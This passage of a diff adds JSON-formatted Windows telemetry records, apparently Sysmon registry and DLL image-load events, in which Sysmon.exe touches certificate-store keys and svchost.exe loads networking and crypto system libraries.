"process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "upnp.dll", + "image_path": "C:\\Windows\\System32\\upnp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879800000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "userenv.dll", + "image_path": "C:\\Windows\\System32\\userenv.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ssdpapi.dll", + "image_path": "C:\\Windows\\System32\\ssdpapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "gpapi.dll", + "image_path": "C:\\Windows\\System32\\gpapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570880110000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software 